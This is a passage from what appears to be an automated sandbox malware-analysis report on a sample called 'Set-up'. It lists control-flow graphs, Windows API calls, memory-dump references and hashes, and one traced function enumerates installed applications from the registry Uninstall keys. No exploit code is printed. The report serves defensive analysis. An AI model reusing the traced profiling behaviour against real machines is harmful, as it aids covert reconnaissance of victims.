713->719 718->719 726 8c9b40-8c9b54 call 8be760 718->726 721 8c9f95-8c9f99 719->721 723 8c9f9b-8c9f9e 721->723 724 8c9fa0-8c9fb6 call 8bebf0 * 2 721->724 723->695 723->724 736 8c9fb7-8c9fbe 724->736 733 8c9f8a-8c9f92 726->733 734 8c9b5a-8c9b6e call 8be730 726->734 733->721 739 8c9b8c-8c9b97 call 8c63f0 734->739 740 8c9b70-8ca004 734->740 736->695 746 8c9b9d-8c9bbf call 8c6740 call 8c63f0 739->746 747 8c9c9a-8c9cab call 8bea00 739->747 745 8ca015-8ca01d 740->745 748 8ca01f-8ca022 745->748 749 8ca024-8ca045 call 8bebf0 * 2 745->749 746->747 766 8c9bc5-8c9bda call 8c6d60 746->766 758 8c9f31-8c9f35 747->758 759 8c9cb1-8c9ccd call 8bea00 call 8be960 747->759 748->698 748->749 749->698 761 8c9f37-8c9f3a 758->761 762 8c9f40-8c9f61 call 8bebf0 * 2 758->762 775 8c9cfd-8c9d0e call 8be960 759->775 776 8c9ccf 759->776 761->681 761->762 762->681 766->747 778 8c9be0-8c9bf4 call 8c6200 call 8c67e0 766->778 787 8c9d10 775->787 788 8c9d53-8c9d55 775->788 779 8c9cd1-8c9cec call 8be9f0 call 8be4a0 776->779 778->747 794 8c9bfa-8c9c0b call 8c6320 778->794 799 8c9cee-8c9cfb call 8be9d0 779->799 800 8c9d47-8c9d51 779->800 793 8c9d12-8c9d2d call 8be9f0 call 8be4a0 787->793 792 8c9e69-8c9e8e call 8bea40 call 8be440 788->792 818 8c9e94-8c9eaa call 8be3c0 792->818 819 8c9e90-8c9e92 792->819 814 8c9d2f-8c9d3c call 8be9d0 793->814 815 8c9d5a-8c9d6f call 8be960 793->815 809 8c9b75-8c9b86 call 8bea00 794->809 810 8c9c11-8c9c1c call 8c7b70 794->810 799->775 799->779 806 8c9dca-8c9ddb call 8be960 800->806 826 8c9ddd-8c9ddf 806->826 827 8c9e2e-8c9e36 806->827 809->739 829 8c9f2d 809->829 810->739 832 8c9c22-8c9c33 call 8be960 810->832 814->793 842 8c9d3e-8c9d42 814->842 845 8c9d71-8c9d73 815->845 846 8c9dc2 815->846 838 8ca04a-8ca04c 818->838 839 8c9eb0-8c9eb1 818->839 825 8c9eb3-8c9ec4 call 8be9c0 819->825 825->681 849 8c9eca-8c9ed0 825->849 834 8c9e06-8c9e21 call 8be9f0 call 8be4a0 826->834 836 8c9e3d-8c9e5b call 8bebf0 * 2 827->836 837 8c9e38-8c9e3b 827->837 829->758 859 8c9c35 832->859 860 8c9c66-8c9c75 call 8c78a0 832->860 872 8c9de1-8c9dee call 8bec80 834->872 873 8c9e23-8c9e2c call 8beac0 834->873 847 8c9e5e-8c9e67 836->847 837->836 837->847 852 8ca04e-8ca051 838->852 853 8ca057-8ca070 call 8bebf0 * 2 838->853 839->825 842->792 854 8c9d9a-8c9db5 call 8be9f0 call 8be4a0 845->854 846->806 847->792 847->825 857 8c9ee5-8c9ef2 call 8be9f0 849->857 852->695 852->853 853->736 887 8c9d75-8c9d82 call 8bec80 854->887 888 8c9db7-8c9dc0 call 8beac0 854->888 857->681 881 8c9ef8-8c9f0e call 8be440 857->881 867 8c9c37-8c9c51 call 8be9f0 _stricmp 859->867 878 8c9c7b-8c9c8f call 8be7c0 860->878 879 8ca011 860->879 867->739 891 8c9c57-8c9c64 call 8be9d0 867->891 892 8c9df1-8c9e04 call 8be960 872->892 873->892 878->739 900 8c9c95-8ca00e 878->900 879->745 903 8c9f10-8c9f26 call 8be3c0 881->903 904 8c9ed2-8c9edf call 8be9e0 881->904 908 8c9d85-8c9d98 call 8be960 887->908 888->908 891->860 891->867 892->827 892->834 900->879 903->904 914 8c9f28 903->914 904->681 904->857 908->846 908->854 914->695
                            APIs
                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(CARES_HOSTS), ref: 008C978D
                            • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 008C97BA
                            • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 008C97E4
                            • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 008C98A5
                            • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000104), ref: 008C9920
                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 008C9946
                            • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 008C9974
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 008C9981
                            • RegCloseKey.ADVAPI32(?), ref: 008C998B
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 008C9992
                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 008C97FE
                              • Part of subcall function 008C78A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000000,008CE16D,?), ref: 008C78AF
                              • Part of subcall function 008C78A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000), ref: 008C78D9
                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 008C9C46
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _stricmp_time64strlen$CloseEnvironmentExpandOpenQueryStringsValue_stat64getenvmemcpymemset
                            • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                            • API String ID: 3843116398-4129964100
                            • Opcode ID: 2a270b349bfa763ee6316b05aae3fdba9b4c7839fb34dfb970dad3280fc840e0
                            • Instruction ID: 69f577570d2922cb1d559d44d320c7876c53bd9c41906a9f0c68655b4a8840be
                            • Opcode Fuzzy Hash: 2a270b349bfa763ee6316b05aae3fdba9b4c7839fb34dfb970dad3280fc840e0
                            • Instruction Fuzzy Hash: 8F3274B5904201AFEB11AB24EC46F5A76B4FF54318F08447CF98AD6362FB31E9298753

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: EnumOpen
                            • String ID: %s\%s$DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall$app_name$d$index$installed_apps
                            • API String ID: 3231578192-3120786300
                            • Opcode ID: 874cdaa55c250da7aa20718e4c6e9be5b1bfc989aa641fbd08752a22b6597c6a
                            • Instruction ID: fd41556093ee64b7ce3d202b332f90cdf0299d6b45f884ff76aabd36055b2e3e
                            • Opcode Fuzzy Hash: 874cdaa55c250da7aa20718e4c6e9be5b1bfc989aa641fbd08752a22b6597c6a
                            • Instruction Fuzzy Hash: ED71B2B49043099FDB50DF69C98479EBBF0FF85308F10899DE898A7341D7749A888F92

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1095 9de5d0-9de602 strlen MultiByteToWideChar 1096 9de608 1095->1096 1097 9de6b0-9de6bb GetLastError 1095->1097 1100 9de60f-9de643 call b89f40 MultiByteToWideChar 1096->1100 1098 9de6bd-9de6d4 MultiByteToWideChar 1097->1098 1099 9de6e2-9de6f2 GetLastError 1097->1099 1098->1099 1101 9de6d6-9de6dd 1098->1101 1102 9de6f4-9de6ff fopen 1099->1102 1103 9de703-9de70a 1099->1103 1100->1103 1106 9de649-9de66d strlen MultiByteToWideChar 1100->1106 1101->1100 1102->1103 1107 9de701 1106->1107 1108 9de673-9de683 _wfopen 1106->1108 1107->1103 1108->1103 1109 9de685-9de68e _errno 1108->1109 1110 9de6a0-9de6ae fopen 1109->1110 1111 9de690-9de69e _errno 1109->1111 1110->1103 1111->1103 1111->1110
                            APIs
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?,0096A31E,?,00D48C14), ref: 009DE5E2
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?), ref: 009DE5FA
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 009DE637
                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(0096A31E), ref: 009DE64D
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0096A31E,00000001,?,00000008,?,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000), ref: 009DE665
                            • _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?,0096A31E,?,00D48C14), ref: 009DE678
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?,0096A31E,?,00D48C14), ref: 009DE685
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?,0096A31E,?,00D48C14), ref: 009DE690
                            • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0096A31E,?,?,?,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?,0096A31E), ref: 009DE6A6
                            • GetLastError.KERNEL32(?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?,0096A31E,?,00D48C14), ref: 009DE6B0
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?), ref: 009DE6CC
                            • GetLastError.KERNEL32(?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?,0096A31E,?,00D48C14), ref: 009DE6E2
                            • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0096A31E,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?,0096A31E,?,00D48C14), ref: 009DE6FA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast_errnofopenstrlen$_wfopen
                            • String ID:
                            • API String ID: 2867842857-0
                            • Opcode ID: c755385a277f73cdbc87a7e5d1b58f04eedcfe3cb603d4f4ce8134670de57120
                            • Instruction ID: 487f10f5fc91e473fb70215e1d82385d38341ed73891d58bfe8b79ad4d1d3bec
                            • Opcode Fuzzy Hash: c755385a277f73cdbc87a7e5d1b58f04eedcfe3cb603d4f4ce8134670de57120
                            • Instruction Fuzzy Hash: 4C31A179240200BFEF217F72DC49F6A3B69EB45711F148569FA129D2E0EA30DD45CBA2

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1112 838b50-838b69 1113 838be6 1112->1113 1114 838b6b-838b74 1112->1114 1115 838be9 1113->1115 1116 838b76-838b8d 1114->1116 1117 838beb-838bf2 1114->1117 1115->1117 1118 838bf3-838bfe call 83a550 1116->1118 1119 838b8f-838ba7 call 816e40 1116->1119 1124 838de4-838def 1118->1124 1125 838c04-838c08 1118->1125 1126 838cd9-838d16 SleepEx getsockopt 1119->1126 1127 838bad-838baf 1119->1127 1128 838df5-838e19 call 83a150 WSASetLastError 1124->1128 1129 838e8c-838e95 1124->1129 1130 838c0e-838c1d 1125->1130 1131 838dbd-838dc3 1125->1131 1134 838d22 1126->1134 1135 838d18-838d20 WSAGetLastError 1126->1135 1132 838ca6-838cb0 1127->1132 1133 838bb5-838bb9 1127->1133 1155 838e1b-838e26 1128->1155 1156 838e88 1128->1156 1142 838f00-838f06 1129->1142 1143 838e97-838e9c 1129->1143 1138 838c35-838c48 WSAGetLastError call 83a150 1130->1138 1139 838c1f-838c2f connect 1130->1139 1131->1115 1132->1126 1137 838cb2-838cb8 1132->1137 1133->1117 1140 838bbb-838bc2 1133->1140 1141 838d26-838d39 1134->1141 1135->1141 1145 838cbe-838cd4 call 83b180 1137->1145 1146 838ddc-838dde 1137->1146 1158 838c4d-838c4f 1138->1158 1139->1138 1140->1117 1148 838bc4-838bcc 1140->1148 1149 838d43-838d61 call 81d8c0 call 83a150 1141->1149 1150 838d3b-838d3d 1141->1150 1142->1117 1151 838edf-838eef call 8078b0 1143->1151 1152 838e9e-838eb6 call 812a00 1143->1152 1145->1124 1146->1115 1146->1124 1160 838bd4-838bda 1148->1160 1161 838bce-838bd2 1148->1161 1179 838d66-838d74 1149->1179 1150->1146 1150->1149 1177 838ef2-838efc 1151->1177 1152->1151 1172 838eb8-838edd call 813410 * 2 1152->1172 1164 838e28-838e2c 1155->1164 1165 838e2e-838e85 call 81d090 call 844fd0 1155->1165 1156->1129 1167 838c51-838c58 1158->1167 1168 838c8e-838c93 1158->1168 1160->1117 1170 838bdc-838be1 1160->1170 1161->1117 1161->1160 1164->1156 1164->1165 1165->1156 1167->1168 1176 838c5a-838c62 1167->1176 1173 838c99-838c9f 1168->1173 1174 838dc8-838dd9 call 83b100 1168->1174 1178 838dac-838db8 call 8450a0 1170->1178 1172->1177 1173->1132 1174->1146 1183 838c64-838c68 1176->1183 1184 838c6a-838c70 1176->1184 1177->1142 1178->1117 1179->1117 1186 838d7a-838d81 1179->1186 1183->1168 1183->1184 1184->1168 1190 838c72-838c8b call 8450a0 1184->1190 1186->1117 1193 838d87-838d8f 1186->1193 1190->1168 1196 838d91-838d95 1193->1196 1197 838d9b-838da1 1193->1197 1196->1117 1196->1197 1197->1117 1200 838da7 1197->1200 1200->1178
                            APIs
                            • connect.WS2_32(?,?,00000001), ref: 00838C2F
                            • WSAGetLastError.WS2_32 ref: 00838C39
                            • SleepEx.KERNELBASE(00000000,00000000), ref: 00838CF3
                            • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00838D0E
                            • WSAGetLastError.WS2_32 ref: 00838D18
                            • WSASetLastError.WS2_32(00000000), ref: 00838E0C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: ErrorLast$Sleepconnectgetsockopt
                            • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                            • API String ID: 2513251565-879669977
                            • Opcode ID: 770de739a95296e0298397fc2197638f5e2f1185a18ea822286d9d3676f8276c
                            • Instruction ID: 0615e726ea264a51b214b52885df79218c68f3d611c46f7dd073a74428f000fe
                            • Opcode Fuzzy Hash: 770de739a95296e0298397fc2197638f5e2f1185a18ea822286d9d3676f8276c
                            • Instruction Fuzzy Hash: B6B1A17460470ADFDB10CF24D885BA6B7A4FF85314F048529F859D72D2DB71E849C7A2

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1341 8076a0-8076be 1342 8076c0-8076c7 1341->1342 1343 8076e6-8076f2 send 1341->1343 1342->1343 1344 8076c9-8076d1 1342->1344 1345 8076f4-807709 call 8072a0 1343->1345 1346 80775e-807762 1343->1346 1348 8076d3-8076e4 send 1344->1348 1349 80770b-807759 call 8072a0 __acrt_iob_func call 80cb20 fflush _errno 1344->1349 1345->1346 1348->1345 1349->1346
                            APIs
                            • send.WS2_32(multi.c,?,?,?), ref: 008076DE
                            • send.WS2_32(multi.c,?,?,?), ref: 008076EA
                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00807721
                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00807745
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0080774D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: send$__acrt_iob_func_errnofflush
                            • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                            • API String ID: 3540913164-3388739168
                            • Opcode ID: dfe9bfa00e28b8ad56ede517e10c7c48b5006fac8fa2a37f12b1e5b31d93997b
                            • Instruction ID: 9f955106f19dc26587c5f881966ac6793bb1f84267497753fbeab361bcc29ac0
                            • Opcode Fuzzy Hash: dfe9bfa00e28b8ad56ede517e10c7c48b5006fac8fa2a37f12b1e5b31d93997b
                            • Instruction Fuzzy Hash: 0711B6B4A0C2486FD6105B5AAC49E277BADEB85B68F040558FC05E3291D671AC05CAB2

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1355 9847b0-9847bf call 9de5d0 1357 9847c4-9847dd strchr 1355->1357 1358 9847df-9847f2 call 97d520 1357->1358 1359 984824-98485e call 9b7120 call 9b7220 GetLastError call 9b7310 _errno 1357->1359 1365 9847f8-98481f call 97d690 call 97df50 1358->1365 1366 98488d-984896 fclose 1358->1366 1376 98486b-98488b call 9b7120 call 9b7220 1359->1376 1377 984860-984869 _errno 1359->1377 1372 9848c4-9848cb 1365->1372 1368 9848c2 1366->1368 1368->1372 1386 9848b8-9848bf call 9b7310 1376->1386 1377->1376 1378 984898-9848b3 call 9b7120 call 9b7220 1377->1378 1378->1386 1386->1368
                            APIs
                              • Part of subcall function 009DE5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?,0096A31E,?,00D48C14), ref: 009DE5E2
                              • Part of subcall function 009DE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?), ref: 009DE5FA
                              • Part of subcall function 009DE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 009DE637
                              • Part of subcall function 009DE5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(0096A31E), ref: 009DE64D
                              • Part of subcall function 009DE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0096A31E,00000001,?,00000008,?,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000), ref: 009DE665
                              • Part of subcall function 009DE5D0: _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?,0096A31E,?,00D48C14), ref: 009DE678
                              • Part of subcall function 009DE5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?,0096A31E,?,00D48C14), ref: 009DE685
                              • Part of subcall function 009DE5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?,0096A31E,?,00D48C14), ref: 009DE690
                              • Part of subcall function 009DE5D0: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0096A31E,?,?,?,?,00000000,009847C4,?,00000000,00000000,00000000,?,00000000,?,0096A31E), ref: 009DE6A6
                            • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000062,?,00D48C14), ref: 009847CC
                            • GetLastError.KERNEL32(?,?,?,?,?,?,00D48C14), ref: 0098483D
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00D48C14), ref: 00984855
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00D48C14), ref: 00984860
                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,00D48C14), ref: 0098488E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_800000_Set-up.jbxd
                            Similarity
                            • API ID: _errno$ByteCharMultiWide$strlen$ErrorLast_wfopenfclosefopenstrchr
                            • String ID: BIO_new_file$calling fopen(%s, %s)$crypto/bio/bss_file.c
                            • API String ID: 3063597995-203430365
                            • Opcode ID: cb782fbad745119c4da0bd67dcc66952905fccd414ea132f46c7c62406083c1d
                            • Instruction ID: e22344d8fbac0667b259fffc1fc12bad6e4a4b01712cc43f009cd2345af08f3f
                            • Opcode Fuzzy Hash: cb782fbad745119c4da0bd67dcc66952905fccd414ea132f46c7c62406083c1d
                            • Instruction Fuzzy Hash: 432107A5F843417FE12036E53C07F6B795DDFE2B68F080121FA09692C3F695991942B3

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                            • Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
